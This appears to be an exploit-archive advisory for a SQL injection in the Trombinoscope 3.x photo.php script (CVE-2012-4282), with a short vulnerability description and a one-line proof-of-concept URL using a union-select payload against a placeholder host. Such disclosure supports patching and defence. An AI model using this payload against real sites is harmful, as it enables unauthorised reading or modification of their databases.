Trombinoscope 3.x - 'photo.php' Server SQL Injection



EKU-ID: 41649 CVE: CVE-2012-4282;OSVDB-84732 OSVDB-ID:
Author: Ramdan Yantu Published: 2012-05-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/53398/info

Trombinoscope is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Trombinoscope 3.5 and prior versions are vulnerable.

http://www.example.com/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--